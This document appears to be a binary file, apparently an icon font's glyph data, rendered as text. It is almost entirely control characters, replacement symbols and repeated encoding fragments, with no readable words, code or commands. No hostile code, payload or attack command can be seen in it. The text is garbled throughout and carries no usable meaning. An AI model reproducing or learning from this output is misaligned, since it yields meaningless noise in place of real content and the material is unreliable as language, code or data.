[[	�@�@��@J4G#����	%'#'7ȹ���չ�p������	%'75'7������������'��	%!'7!������ҹ���#����	%'737�����������p�<����<Jf%'5.54>67%.=4>=4>7%54.&4.55&7>=�
	��

)77)	���!,,!��-�B@J�

�	; 6**6 ;

.=-  -=,��;����	?%;�%�X�a���W�%���`[����3i'7>4&'."267#".'.46?>27>2"&'.46?'32>?>4&'."�Z
Z')'�[  
[')'Z')'Z')'![  &)'[')'���	!!!!#35!!����<�<����-��-��Kyy���	!!!!7!53!#53��x���K��xK=[��K����[=���	!!!5!!53!5#537!53!5#53K��K��y��<Z��<�����y<����<�����$97'7'.'7>54.'77'7.54>6�4�
  !�544��		
		
"5�
 ""	
�364��	

	���	&%'777'.='7>='�nn���Z	�	D�nF��l�����

�����	!!!5!%!!%'''77�<��x��x��xpI/Kf�N(_�<�Z<<[-��7G2����+\���,Z".#"7>?4646'6.#./4&6&7&>323'>32x#!	%1&KQ?
DQL
$3f
:H@
@C>(&&(�%1	1eR69Td.	1%�%SK;

8JU(	''''����	�Wp.4&7&>32>32'>57&6&6'6.#"#.#"./.'74>7'7''7777'$3#!	%1&(&&(�"(/81
"0:-+!
�VUVU_KWTWTM]#	1%%1		
	''''		
	��'1$;,,;#1'�====C6<<<<6C>����.=4>7>=4.&44.=404=4.'405'.=40454.&405.5544.'"./.'1223.=./.67>7>54>6234>626666267�"cc

			
[�		


	�tz)�����%��
	
	�
		
/����##".=4>7>?46.'*"*&'&"&'.574.'""#*#".5'4.#"0""&'.5'4.'."&#""./.2#".=./.67>7>'&>7>7254>32>7>306243>2�$#	/jj		
		
		=�
	�d������;��		
�				

	

^����#".=4>7>=4.#""1#".=4.#"#".51581504.#"001#".515.#"81#".="&"&"017:#".=./.467>72625820=4>32>32>32626232�4	3

		
7�	66	�	@==NQe!p5'n7

	

���
'#!!'3%535!�;���H;��<���<h<�<�==y�x��"����%
/7#3���f��[���,__��-����
#3!!7'!!5��jZ��XW;�AA��wz\X�����
#33##535#5#35'335#�����x=<[�����<�<����'�{3H]r�%.#"32>7464&5".'>32#5"32>54.#".54>32#5"32>54.#".54>32#�3CO++OC33CO++OC3�%F;--;F%%F;--;F%((((



�%=++=%$=++=$�%3 4%%4 3%�((((�



y		4���	&'7'##!".7'#3!2>7'#���oo`�Y

�

-��q��Eq]���		�����	
75#'7'31#'#5'7�n��n2nn����n��n+n��n�����	";@7!5!7!!5%!"3!2>54.##!".54>3!23#5<��xL��y�Z		�		�Z����ҕ��ӵ�Z	��		2	��2��I���Ldp�#<=!#32>?#35#5>732>7>7>="&'.'.53'".'!#7"&/>73D��D	Y�\
�x	'�3>!<"=2�	
&�
!E;,=<
,;E!
��0C)

!HFCCPq}-5mJ�)C0:DN-

�����''!'!!%!'77|{�4�4���t��t��fxth��s�v�s�<�W��X����8Tp+532>=4.#!";75#".=4>3!2+'#".=4>;2#4.+";532>=	�Z-6h		�	Z	n		�	�%E-��
��W/[|
�		�\	\\	\	

	\::\���7!";7!2>54.##!5#".54>3!2�Z		�
		��d-��	��
{{
-	��XX-�����7<AF!";7!2>54.##!5#".54>3!2!!5!!53#5�Z		�
		��d-��xL��L�����	��
{{
-	��XX-��=<#��%''7'77��������������������j�N'54.'>=4."'"54>65'.=4>6j	

		'(`��
�+�

	
���-$$d�f%''7�����z���������%'7'7����������r��t�7'7����������[�\'77�����G����2��	'7���z���j�nz����
3!3#!''��Z��j��g��M2�����Gg[��N�"7G5##!!!5332>54.'3'#".54>32'.#"#5!#�W\��/�<�!+,!/<!!!!��H���j���,!!,ӗ!!!!Z==	�DUb#"54.+";2>=32>7;2>54.#".5<645#%#5%#53%53�:��	+		+	&"_:���
�y��y�		
&Y��H(�,�������2'#*1#7>32#4.#"30:32>5����	��		AJ�����

g
1���(-2757757'%'%5'57>6%7.&%%575�Z-�<m
 &,,'
m���	!!	4�x��<�X-/<���##��
	

���������#3%#77#733��G3=Xb\�'22�b=�Ӷ�xx���d�%'7#73ds\��t����������
5##!#!5!!#'##5#'7#5��ӵ�x���.N-88.O�<<��-����=FVZZVF����!&354.+"#!#'4>;2#5!5!!53353353�
�

[�Z���-�x��x=�<hH



H�x�HHH�N��<<���� %'77'77''7''7'7'7�1�2UW0�3UU3�0WU2�1WW�2�1WW1�2UW0�3UU3�0WU���t�%'7'7'7_usQOusQOuwwRzRwwR��R	l�T%'7!'7!'7�wR��RwwRzRw�tPPttPPt���� %#53'3#537'#53#7#53#553�X��X����X��X��������X��X����X��XxX��	#5'#5!���6�����6X��	%r���6X6������0''7.54>64.'7>5�nn�(F]55]F((F]55]F($=R//R=$$=R//R=$2�oo�Q6\G''G\64^E))E^40Q>##>Q0.S<%%<S.���0'7'7#".'>32#.#"32>7΃�oo1)E^46\G''G\64^E)#>Q0.S<%%<S.0Q>#c��nn�5]F((F]55]F((F]5/R=$$=R//R=$$=R/���0'7#".54>32#4.#"32>5Gnn���(F]55]F((F]55]F($=R//R=$$=R//R=$Nnn��n5]F((F]55]F((F]5/R=$$=R//R=$$=R/���0'77#".54>32#4.#"32>5n��nn�(F]55]F((F]55]F($=R//R=$$=R//R=$'��nnG5]F((F]55]F((F]5/R=$$=R//R=$$=R/2E��
''757'7�����)����g����?��
%'7'7'7'"����<��������������4��
7'77'7'7����'�������������2��
%'77'7'����������h����<����	#(-27Vq#!'#533533!73#5353#=3##3#553#5353#'3#5"30:3>7>54.##".54>32#���
cc�[<���=






	
�`�4cc�R�����<=<�			J
���!.;HUbn�����"32>'6.#3#.'7#>7373#&>73#.7;#>57.'3#7#.''#>7:623:23#>73.'.'3*"#*&"#7>735]F((F]54_D))D_4�ZMZZM.�����[OP	Y,F	
 ��
R
G uG
"
�	�O
	F
"�(F]55]F((F]55]F(��

Z

x



y

Y

		
��

Y



<���� BW%#".'>732>7#'#'.'>327332>7.#"3H&1 6*)" -& �9�

	or�!��
		
]+ )6 /'&,!#D|�
		x=|m		���	!5!!5!!5!7!!5!5!7!!5��<���<��<�xxZ<<�xxZ<<��yyZ<<���	"',16;!5!!5!!5!7!!5!5!7!!535#73#535#73#535#73#5�i��K��-��i��-��i��-�ӵxx<<xx<<xx<<�xxZ<<�xxZ<<��yyZ<<xxZ<<��xxZ<<��yyZ<<���	"'35#73#5%35##5335#73#535#73#5�����ӵ�����������
�ӵ���ӵ�����ӵ����ӵ��:�h#3#5#3#535##533#353#35#5335#�<[<��<[<h=��==��=���!5!37'7���n��n���Un��n<����"'##".=#53#32>=#53!5!�-=""=-[%11%[�x��x��"<--<"��1%%1��<���27La~!##380132>58401380132>5840133#7".54>32#!".54>32#7#.#"#.#"#535!��W$:<


�


<�u@[Z'
	
�
	
'��[x�				iyZZ��				=



Z������07535#332>54.'".54>32#73#53-x-,M9!$=R//R=$!9M,(H55H((H55H(y��%=O-/R=$$=R/-O=%�[5G)(H55H()G5�xZx����.>#".=#354>323#32>73#53.#"#53#jjjjX/�/t/�/�		�<		�

���x

��I�����%+".'.+".54>;2;:>3>454.+".54>;2>54.+".54>;2>54.#*1#".54>;82132>54.+".'.4?>4'4.#81"+".54>;7>381232�		
�
??
�&+!�bNE]


t	
�	
	R��	@	

���%+#81".'.46?#".54>7.54>7.454>7.54>;2;2+".'.+";2+";2+"32+8"1#";:32>?>;2�E]


t	
		�
??
�
&+�aN��

@

	



S�Z����555�y2�2yL�Z>��k<\���!5!%735#3'7���~�zH�|�r�[�Ez�Ywg��d
7'7753#53'!5!��r~�zH�|���wf[�Ey�Y����	%'7537357'7!5!AVV22P2VV2��TVV2rr2Jrr2VV2�	����	73#'7%#37'3#Brr2VV2_2rr2VV��2VV2G22VV������#3#5#3#535##53%!353#35#335#�=[<�-��x[y.=��=vN0��j0N
����).38=BGLQ"32>54.#".54>32#7#533#57#53#537'7'73'7/7&&&&�ZZ��ZZ�@@�@@�@@�@@I&&&&��ZZ��ZZ�d@@�@@@@�@@���	'7!5!'773#���n��Tn�r��nnn����	%!'7!3#��n��nT��n��n������%7I.5'.5'372>=57>7.5%>7�!!!!BQFGQC�x	
=:+�*:>
	� 

 ""�<\; ;\>��~			��#4F*-E5!	O
����Ncx�!!!332>54.'5332>54.'5332>54.'53#".54>323#".54>323#".54>32�<��x<

	
Z		Z
	

<��xy���!	



	!!	



	!!	



	!�<y���"Am��4.'>5'4>45%.'.54>7.=62672>7544>7'7'&&.'.=3>72>75.'.=7>7>7-I[//[I--I[//[I-�0S="	*2882*	"=S00S=".5<3-'"=S0�*28/*$	.5<<5.	*2882*	.5<<5.	w'

'��'

'L

	





	

�;
1

3�			
00
	e



2	

	2
&�|%:`u4.#"32>7#0>7104041".54>32#%040414.#"32>7#0>71".54>32#�&''
*'1<5j�''')'1<5j''&'./]OLJ''&'./]OJ&�|%:`u%">5'3"232>'6.#".7&>32#%">7'#2"32>7.#".'>32#�
*&0=4&''

��	
((2;6'&&

�'/
/]O&&'��'/
/]O&&'����
%'#3735�9gyHOe2wl"d������|4O	���
&+05:#5'##3!535'#5'33!5!5!7#5!#5!+53#53'#533#53[��ZZLZ�FF��x����Z<��<�<xx�=+7~��]]�~AAy��9��]XX��<�����*/%#".54>732>54.'7#3�$=R//R=$/A&!9)5H((H5)8"&A/��/R=$$=R/'I;)	$3?")G55G)"?3$);I'��-Z����
 %*/432>=!#".=!'#533#533#57#53#53Z-=""=-��.%11%�xZZ����h� 6))6 ��,!!,xx�ZZZZ��ZZ�<��� +3%#".54>732>77+532'.'3�%=P,/R=$ 9L,&B15H('D5!=�.R>#0?$��-L9!$=R/,O=&!4E&(H52B'+�$=R/#@0�����#!";33335#".54>;�,  ,[=x�[  [� ++ ���[��!!����	$9Ti��!!!!%35>54.'5#72#".54>335>54.'5#72#".54>32>54.'5#352#".54>3��<��



				i



x

				���<�TT
		
VV

		
K	��
		


		
K	�		��		M				���%''7'7''7����N�M���N�N�������a��``BakJKKKJ5O��O
��
O��O`��37'.#"32>7&4&6'".'>32#�
�	!!
���



Zd��   7P��				$���;QVk.#"32>7940<1<0415.#"32>71%".54>32#5%".54>32#�
	 

 
	   ��:				X���				�� 

�5�  
aA�o			Y5Y5��				Z����-D["32>=4.##".=4>32'"32>=4.##".=4>32"=--=""=--="�%11%%11%�				�-<#�#<--<#�#<-��2%%2�2%%2��
<		<
j<<Z����(6"32>=4.##5'#54>7".=!#"=--=""=--="�y,!�y!,1%%1�-<#�#<--<#�#<-��#/��/#�>%2��2%���i�ER_%9"040#1'574.'5#389.5#35>54.''.54>7'5C2
	
!!	
7
	!!

	v
	
$B!
	
�&�

"//"*�

"//"Z


��

<����:Hi%2>=4.'5#335>335235#54>73#".=+#5#".=3;2>=31%!,,!%1K��&&-$2--2$&x&w%1Z.$$.Z1%+:OXXO:w-&&-b)ZZ)bbb��	5
5%5%�<�<�<�<�<>�=;�;=:��	#8M!5!!5!!5!"32>54.#"32>54.#"32>54.#�K��K��K��[						�<<�<<�==j����
/37'''3#7<�������yw�xz�xzZ+��,0M1#��"����$#������+5:DYn'.&'57'.54>7'#7'5>?4.&>54>7'.5�%$�����		� x�yy-!y		4h$$��+/I=/*%

%*/]3-!�!���ˊ!.3��%D

	

	���;73".54>;'7'7#"%2+7'7'32>54.#*5''51VV1*Q**1VV15''5�,!)77)1VU1 ,� ,,!2VV1)77)Z����+@U"7>54.#.54>32"32>54.#".54>32#"=-/8118/-="
.,!%11%!,.
!!!!				�-<#1lZ=

=Zl1#<-�E>NT%2$$2%TN>k!  !�	
		
		:�.3H]bw�5.54>64.'7>55''.54>7'4.&>5%5%'.54>64.'7>5��i�Z
		
[i��=
		
[i��=
		
h 

		�



� Z����+:Z";2>=4>7>54.##".=3#7#.'.54>32"=-


	<		
	-="<Z8
\
		%11%		�/@%+"
?



@
#+%@/�11�	

	$5((5%x����3#53#53#f�["�["��y��E�
%#535#5332>54.#"3E�65S6T		

2��4
	

	
whe%#".'1'84"9'.#"32>77##".54>32532>54.#"'71>32!,	m
!!,!!,
o!!
	
,!�, 
�!!	

 ,,!

�	!!$$	
!,�	���%'4>75.'.'.>740<=4>7>6"4.'#57>?0<1&>564.'&"#&04033%'575��<�k$
$

	


w��yy���k��/��
	
	


5
			2
�;x����3'#3#3#5'3#5#53�l�y"b"x�7�|&&hxxq��qZ<<�<������#'###!##'3#''7�Z�Z��[Y&��������-���������x�I%#".54>32.#"14>3234>7>76.'7




(/3'$
	



		!





x#+$	
	 	�8GV%.#";535#5#>32##332>=4.'#".=4>;%+532�%=P--P=%	-!4E''E4!-	�[��3YB&&BY3y	
�,M9!!9M,�
	y�y��y	���)6;@EJ_t%"32>7.#".'>32#'!3!7'3'%!!77!!%!7!%7!!%"32>'6.#".7&>32#�				

hW��W�!!�f59�X:H��;�?%u'�>��;z

h
	

	
=V_]�#��$�A<<�<yy�,,J��j
		
<:�%:!!7'!!77!!%"32>'6.#".7&>32#���W�W��1<�V=J��;z

���Ɔ[[��y
	

	
<���;Zy�����702815>7>54.'.".'."7>32>7#>32.'.54>7!3!5353''#3#5!537'37#'3�#'%

	


			%&$Z				"	
�		
	 !�����[ 2'"��
���x�ASh��7				


		



	�





�x��x�$�<<��=#���<<�'Q^s�5#;732>732>=4.'+'0#".#'#".=>735%3##5#53532>54.#"352#".54>3(VF-	6<98	-FV(�%;&%>$$8H))H8$���



	

	hZZ�	vv	���z{���=

	

	

=����
35!#5'!�Z� ��l��������������
"#3733#3'#'!'##'33!x��xz��EE�yL���EE��y���=y�(~7AA#�Z(~8AA��jy�<����	#!'#533!#���
ccӵ����`�4cc�Rė�����38'.7>.'/.657'74>2762'?���`��
	�kWT�?�R�T�t��aZ��8%	��2�ho�j�Z��<����	!!'!#3#3!7%#37'<��xQ*:*�wy ���yw �xZZ��"uD��E��"���!5!/#'7�nnn���nc��n������
'#'##33'37#7!#�U����S��U>>�=g<<���lN�IN)����"37'#5##3#33535#5'!!5!'7!�;;����;;����4#$��L��$#4+MJ�<INxx�<y,/[��.,ZI�/La%#53.''7.'#5'3#54>32##".54>7'7:6232#4.#"32>5��	"$$"
	��(F]55]F(�			>@	�$"
	ZZ	
"$5]E))E]5





mp
Z:��	ZL��.�����M�����)M75>;'7'7#"'1+32>717'7#"./.+32;7'
!	:2VV2: ]^^
�2:�	^^~
:2VV(
1VU1	
)s	

##
1
	�	
	�
1VVZ1��-5Z^���������1}�Z��	73#3#73##3Zxz><�zxZ<>��xj��L�x���L��Z)��7'5'7'7Z����T���������@vw�v����4)��7'7%'7��ݿ���ܦ����n�wwv�w����Xw$R".#"&3!2>54.#!".54>3:37>327>32#�


)"%$/##/��
#
$$X


!$$"//"�


		##�U_'5>54.&'.&'&&&7'.54>3>6>67'775#/SS$$
#
oo$$")


/#�VV22/""%
		

	$$
"		"0AUU3��1	�U_'5>54.&'.&'&&&7'.54>3>6>65'7'#/SS$$
#
oo$%")


/#�2VV2/""%
		

	$$
"		"0���1WW1����.!3#!#53!53>323'#54.#"#35�<D&�'EZ��]]ZZ���<��x�[yy[<<��+27<Qf�%#'##380132>58401380132>5840135+53'3#7".54>32#!".54>32#7#.#"#.#"#5!;>�Z><


�


<]uG.�i�C/Z'
	
�
	
'ijxx�				�ZZZZZ��				=



ZZ���(5##5##!##3#5#3#5!!53353353!�[�[ZZ=�j�<�<<[�[<�<��<�<<<<�Z
��+]====]���1H_".#".#"#70>3235>321'>32.#".#">323� +'"$() 
 
L

�*&#!"#%�&#$%#�		
�]���e��
c������16M%0.=4.#"!'%>=4>32!#533#".5332>5�-=""=-���
%11%
���		7$c#>..>#c#c3&&3ci�x			��� ,9FR^kx"32>'6.#>7#.'3'#7'#.'>7>7#.'3>73.''35]F((F]54_D))D_4�
	
ZZ
	
\C
[)$"
�X
&'�	ZZ	\
X'&�[


"$)�(F]55]F((F]55]F(� 

!!

 �"%&�
B�&%"�!

  

!�"%&�B�&%"
���
!5!%335#35733#35733#3��<<y�<x�=y�����Z����y����xj���
!5!'335#35'33#35'33#3��=y�<x�<y�����Z����y����xj<����%#".54>;'7'7#";��"=--="XPttPX1%%1�-=""<-PttO%12$I����%+'732>54.+532�-="XPttPX1%%1��"=-�"<-OutO%11%-="<��%#53#53#53Ħs���r6¦7s���r���
)@!3!35!!!5!32>54.+"3532+".54>3��<�x��<�ӗ		�



��
		
�y��Ky�Z-��K==�	
		
	Z3	��>S%'7'3'#'>7.#"#3.'7'732>77&>32#".7�/_7(.,

.,& 9
^0	+13)�



e^/%� 

 �%/^'++'0	

	

�	!5!!5!!5!!5!��Z��ZZ��-����xy�	!5!!!5!5!!5!�Z�Z��Z�-���y�y�	!5!!5!!5!!5!�������xy�	!5!!5!!5!!5!��-��Z-�i.���y�y����!!!#'3#".7&>32����s�	

	��K�=��Z�vv?-����Sh}��>54.#".'535#3.#"732>77'>54.''2.'>34>32.5".54>32#73#53�	

Z

		
&$ #''# $&
	:
		
��

		�%B11B%%B11B%y�

	

	



%" 
40

04
 "%

n	4	��1A&%B11B%&A1�xZ����
!&+5!!53#3#!#37#535#53'53#'3#53#5��x�<<��<<L��<�xx�<�<��Z�<�<<[[yZZx[[==���'6:!#"7.+'33!!'#'73373#'>;27#7_��MI


����y��"!!Y;�dd�<	����	���`��ZB����B=--5cc���	!!!5!!!#53+53+53��<�<�<�<=�<�[[�x��L-���	"',16;@EJOTY^chmrw|��������������������3#535#;5#;5#;5#;5#;5#35#;5#;5#;5#;5#;5#35#;5#;5#;5#;5#;5#;5#35#35#35#35#35#35#35#35#35#35#35#35#35#35#35#35#35#35#35#35#35#35#35#35#35#<<=<<<=��<=x<=��<=<<<=<������Z=<<<=<j=<<<=<<�<=<<<=<<"���	"',16;@EJOTY^chmrw|��������3#53#353#353#353#353#3535#35#;5#;5#;5#;5#;5#;5#35#35#35#35#35#35#35#35#35#35#35#35#35#35#35#35#35#35#'""#*#"&*#/"&"&#'./74&4&5/<&546<5?46465'7>?26263?26232237<1/./7.''./*#'0172263?>?>7'7>?0<5<[<<<=��<=<<<=<��+(


(++(
		

(+'$$''$$'��Z=<<<=<<�<=<<<=<<

(++(


(++(
$''$$''$!���	"',16;@EJOTY^chmrw|��������3#53#353#353#353#353#3535#35#;5#;5#;5#;5#;5#;5#35#35#35#35#35#35#35#35#35#35#35#35#35#35#35#35#35#35#%'7'<[<<<=��<=<<<=<�}��}��Z=<<<=<<�<=<<<=<<�|��|���8GL\"13!53!".50201223821!#";!%".=4>;##53'5!".54>3!#/


�;�/xV



V��"����j��
��

2t�x![

	
Zx=F((�y�
���	"',1!!#'373#/3##737'3#%3#53#5!5!5#73��GO�GXGX:GXGXSGXGX3GXGX��9G�{G4�<�TG
�<�Z<<[<<[<<<<<<<<<[<<�����<<�3W54.'54>75&'77>=''.='.=4>%7�	���

,



	�	yy[y�-,yD	;

�
CS/S�U�=|S���������.&77>54.'&&'01&"&"'7>5<.'75.54>7667>5<.'>5''.54>7.54>65'.54>6%5�M



	
u	f		
N	
ZF	+,,Z>J���+M	



v

g
		L?[
	G[���;��7J�Q��i*+1&".54>75#"*#*#*.'<>732>3>32"."#*.54>3:">'4.#"50&465>7>54.#"1>54.#0"#3>303812>732>774>7>54.#"54.#"04>54."#*30281>;3:023>;32>7"#*&47.54>7>54.#8"01"8132>77:63>454."'3#'4>7>54&041&04"'0*&1"&*#*#1>7>>4'4.#&1"#8"110>14>3>:3820120>7#.103861>74>564>51>454.#O
	
	u		

	
			
	6	q

		


				T


	

		

		
J
	
	
!%
		
	��Lav�"10>7>76.#>45.'.7>7>32%4>32#".574>32#".5.1>1
mL.4F)0cQ77]C�<QW
 .7
)$ 
���		�?jM,%cZ@�"c`I
$"#*fY<��	
 (,!		330�		KE+ !��.CN#2>7>76.2#".7&>32#".'>3>3.#�lM-5E*/dQ7
N�]t



�
		
)&b[?@iN+�"c`I
$"#1y^*_		w !E+��� -.''%''6>7%%''''�(+-%!	n�n�"�"�;��;==;�!!�w�;	
�YK���=;;=���"A%4.+?4.+"#"3!535!54>;'54>;232	�&
Z	&�	��<
�0Z0�
y	�j

e�	{{]]	�cd�	]'����
'777'3#�PPdd�NNff�0PPeePPee����3'.?7>54.'7''7'7>272�*���B���?@'Oa'98�@�*l*��A�	
�>@w`&;
�@�)���P3#3#!3#3#.54>327.#"#".'32>54.'Z<<Z�==[[�
				


	 
��x��x��	
	




		
����%'7'73#�eOOe��ePPe��6��-�'773#�PPdd^0PPee������#'!777777!3'7#5��	YL�p�����	�IYM����蠂�<����!&+7777!''''!#53#537#533#5<=.-----<�xj------ L[��<yyZ������K999999K��Y%999999'��w/y<xZ����73#57!5?/!/?#!5����!"


"!#	�$���QBB�%%��	
����7'7%'7?/'7/?���]Bo
/�/!��9t��
t�����!/�/
o(�t~�
����K�#(-#"74.#32#54>3'3#'53#=3#<	LJ	<<ZR ZZZZ�	����A	�x77U�������'Mbw��"'.54>7>27>54.#'.".54>32'"32>54.#".54>32#'".54>32#'#".54>322XA&$>T0'Rp
)&AX2}^":*!:L,,L:! #





Z				S�&AX20VA'R		p-3:2XA&�f^



	&6B%,L:!!:L,0,&�				Zi
	



	
�+)>Sh}"32>54.#".54>32#7"32>54.#".54>32#7"32>54.#".54>32#<		
		
		�				�
		
				+	
		
	ZZ	
		
	ZZ	
		
	Z�+)>7#".54>327"32>54.#3"32>54.#x	
		
	�				�
		
		�		
		
<	
		
		
		
	�����CQ>54.&57'5>55'.54>7'>7'^	"//"	"--"�	$$	*B
	
/""/
	�;=�6QxzO8

$$

��������$?#".5#32>5##53!#53".=332>=3#K�(@Q))Q@(�y[[��[[iD;'[&&[';D��1��0J22J0:ZZZZ�<(@.��%%��.@(�+	!5!!5!���+x��	"73#535#;5#;5##35#;5#735#HU�U�U���	73#535#735#xx�xx�xx����	!!!!��<����<���	"',16;@EJO!!!!%3#553#53#553#553#53#553#53#53#553#53#53#53#53#5��<�x.���<�y�xy��=-y=y<<=<����	"',16;@EJOTY^chmrw|���3#535#;5##35#;5#;5#;5#35#35#35#535#35#35#535#35#35##35#;5#;5##35##35#35#35#535#535#35#35#35#<�<�=<�=�<<�<�=��<�yK��<y�=<<���5#!!#53!3!53#����xxx��<�-yyy��Z���j[��-���
!!##53##53!3#5!!i���yyy�����yy�<���Z�======�������
#33!!3#553#!#535!���K��yyyyy����yx�ėZ�-=�xI�
5#353!5!3#553#���K��xx�yy�xZ[[�	!!!!%'7?'7'��<��GG11�11GG�Z��xj��nGG2222GG:�	7!!!!3#5!3#5<��xL����:L��.���������	"',16;@EJOTY^chmrw|��#335##35##35#;5#;5##35#535#535#35#535#35#35#35#535#7#35+35+353#3535#35#535#535#35#535#35#535#���5�56��5k5������x�<-y�Z<y<�<y ���	"',16;@EJOTY^chmrw|�������3#535##35##35##35##35##35#;5#!35#535#35#535#35#535#535#35#35#35##35#!35##35##35#;5##35##35#35#35#535#535#35#535#35#�=<<<y<j��<-<x����=�x<y�����<y�x�y���	"',16;@EJOTY^chmrw|��3#35#;5##35##35#;5#;5#35#35#535#535#35#35#35#35#35##35##35##35##35#35#535#535#35#535#535#35#����5k5�65659������<x<=��Z<�x�=����!!'!'!7?'����������V����<��v�ù�ͺ�
������
	!5!#53#3#5#53��x�ZZ�ZZKZZ
ZZZ����	"'!5!!5!!5!7!!5!5!7!!5!5!7!!5ZL��.����L����L����L�����ZZ<�ZZ<�ZZ<�[[<�
	735#73#535#73#5735##53��ZZ���ZZ���yZZ�ZZ<<ZZ<ZZ<�
	!5!3#5#53'3#5#53�ZZZZ�ZZ�ZZ
ZZ���	7!!5!5!!!!!<�<�-��-��<�XZ��K��Xh	"5%7'557'5757'5������A��Giii�����#��h������ xY= ���	%!5!!!5!!!!�x�[��-���<�wi�<��x�:�	5%%��<���k������	%!5!!!5!!!!i��-��-���<���<��x����	7!!5!5!!!!!�<-����<�XZ��K��Xh	"3#73#'73#73#'3#7!!73#7-��jh������������hy<x<��������	7!!5!5!!!!!�<Z�����<�XZ��K��:�h	!5!!5!!5!!!5�<��x���L����xh���xx<=:�	"'!5!!5!'3#535#!!5!5!'3#535#����K�����ZZ�����K�����ZZh[��y[[x[y��y[[�	!5!!5!35#!!5!5!35#����K���������K�����I<��Z[��:�	!5!!5!!!5!5!��Z��Z���Z��Z�I==x<<yXh	"#53#35'35#35#35#!!!5!�KK---ZZZZKK�Z��xK��IZ<�=�������%!5!�� ����	"',16;@EJOTY^chmrw|�������35#73#535#73#535#73#5735##5335#73#535#73#535#73#535#73#535#73#535#73#535#73#535#73#535#73#535#73#535#73#535#73#5ZZ[ZZZZZ[ZZ<�ZZZ[ZZZZZ[ZZ�xZZ[ZZZZZ[ZZ�xZZ[ZZZZZ[ZZhZZ<<ZZ<<ZZ<ZZ<�ZZ<<ZZ<<ZZ<<ZZ<�ZZ<<ZZ<<ZZ<<ZZ<�ZZ<<ZZ<<ZZ<<ZZ<���	"',16;@EJOTY35#73#535#73#5735##5335#73#535#73#535#73#535#73#535#73#535#73#5��ZZ���ZZ���yZZ���ZZ���ZZ���ZZ�x��ZZ���ZZ���ZZI��yZZy��yZZ��xZZӖ�xZZx��xZZx��xZZ�ӗ�xZZx��xZZx��xZZ����	"'35#73#5735##5335#73#535#73#5������ӵ���<���������
�ӵ���ӵ�����ӵ����ӵ���	"',16;@EJO3#535#35#!35#35#35#%35#35##35!#3535#35#%35#35#35#!35#ZZZZ��ZZZZ�yyyyxxxx�[[ZZ��yyyyxxxx��[[ZZ�[[[[[�[[[[.=[[�===<:�	'%5%5��<�<��.������M����;=:�	'%5%5��<�Z��.������M����Y=;:�	%!'!7!!!!37#���M[��=��ށ�����L���<<X�	#5335#%!!!!5#35�ӗ�����<���
<���.��=<<X�	#5335#%!!!!5#35���ӗ���<��
<���.��=<<����	"'3#3#3#3#3#3#73##3ZZ[ZZZZZ[ZZ< ��<���<���<����<���	3#3#3#3#73##3��ZZ���ZZ���yZZ ��<���<����<���	3#3#73##3�������ӵ� ��<����<���	!5!!5!!!7!!5!5!7!!5��<���<��<�ZZ<��������ZZ<���	!!!!!5!5!!��<�<�<�<�����==�<<���	"',16;!!!5!%35#73#5!5!7!!535#73#5!5!7!!535#73#5x��xj��K�ZZZ��xK���ZZZ��xK���ZZ����ӗZZ<��[[==[[=�ZZ<<ZZ<Z����	:5!97".54>32#5>54.#"'5!Z������y
		
y����Z�ι




�ў����)4I"32>54.#".54>32#73#535#53'4>32#".55]F((F]55]F((F]5/R=$$=R//R=$$=R/Z;7�(F]55]F((F]55]F(�$=R//R=$$=R//R=$m������)>s"32>54.#".54>32#7#".54>327#4>7>76.'.#"#>325]F((F]55]F((F]5/R=$$=R//R=$$=R/#	


	

!	�(F]55]F((F]55]F(�$=R//R=$$=R//R=$r�
	
	


���Zq��.#";;2>54.+"#".'3535#5#>32##332>=4.'32+".54>3'#".=4>;%+532�*9E%%E9*$RZ

ZR
 
%0::0%
-	�ZZ��+(C//C(	x
	"		
	�"7((7"�
x	��[x��xQ�����%#".=4>7>=4.#"#".=4.#"#".=4.#"#.=4.#"#./.#".=./.>76254>322>2322>2322>232�!cc

		

�``/&n�%��
	�	

	F	



���%+++".'.+".54>;2;2>54.#".74>;2>54.#".54>;2>54.#.54>;2>54.+".'&4>?>&'."+".54>;>?>32�
F	
	
	`		
`/&m�%��
�
�			

!cc

���%+"+".5<>5#".5<>5.5<>5#".54>;'.47>32+".'./.+";2";2#";2#";2>7>;2�`	


	F	

	�
��$�n&/`I

			

bb!K�����%"./#".=""#".'""#".=""#".=4>7>=4>3232>54>381232>5>3232>5>332>=4>3>67>&/4.'".=4>32�

		

!cc�
	�	

	F	



``/&n�%�����%%!!5!#''#5#775!!!53!#53��x���KN"Dl�H?&*��K���xK<Z�-�x[�d%u���yl)6Z<<�x<L���)Rg|"32>54.#".54>32#7#".54>3232>54>32%4>32#".534>32#".55]F((F]55]F((F]5/R=$$=R//R=$$=R/�%11%&&���(F]55]F((F]55]F(�$=R//R=$$=R//R=$�1%%1&&i���)Rg|"32>54.#".54>32#7#".54.#"#".54>32%4>32#".534>32#".55]F((F]55]F((F]5/R=$$=R//R=$$=R/�&&%11%���(F]55]F((F]55]F(�$=R//R=$$=R//R=$Z''2%%2��'6!"3!2>54.##!".=!54>3!2!�Z		�		�Z�<��<�
	��	

	.	
����..Z��?''%#3Z����/)����.vw�M�x�Z��7'73#��ݿ����߶n�vvw�;�x�K+��)"32>54.#".54>32#%B11B%%B11B%7))77))7�1B%%B11B%%B1��)77))77)<:��!'#7!5!��n�w�v�x����/�������+@\z%3#".5332>5'2>54.#"332>54.#"3#".'7.54>32#4.#"732>5�%11%&&�		x�$=R/
�V$=R//R=$5G)(H52a)G5�1%%1&&-/R=$V�
/R=$$=R/)G55G)a25H(���"7W\%4.'754.'''5'5''5''5''5''7%%54>7'54>7775	�		<		�	�'3�3��G�<��>��	n

g"

h��j�;=Y[xz;=���L@geBJ�,����*Ahv����^u2>7>=4.'.#"3'4>32#".=.4&=332>753#5#".'#54>32.'373#5.'.'."#*23:>7>7>5<.'##5#53#5#".'4.4=3332>7537#".'#53>327#32>56<53#".'.=4>7>32'#".'5>32�		Jc��#I('(('(	('(('(��YMaa3				z
2				2
g<<]pim��

/

KKrMM

�		

���phl�*�>	9
1

#=V���;.#*#2362#".'.'4&4&/.'.'"."#"2:>72>302232>7>7>764.'"'./.'.'.'.#""#0&401>7>7>3:2332>7>56.'.'>726:32�


 !		



#
!




		


	

				

�	'






		&">7-

8	'5< 			


	
			�i�#>7#.&.'".'441&"'&"&#7&&"'>50<#>7'&"&#>7>4'.'.'445>54.'".'46564>764.'.'465>7>45.<54>723301		'!=70


!#&)+IoL'R BeF	
	
	/26

	'&

!
5Wj5	E)`N6
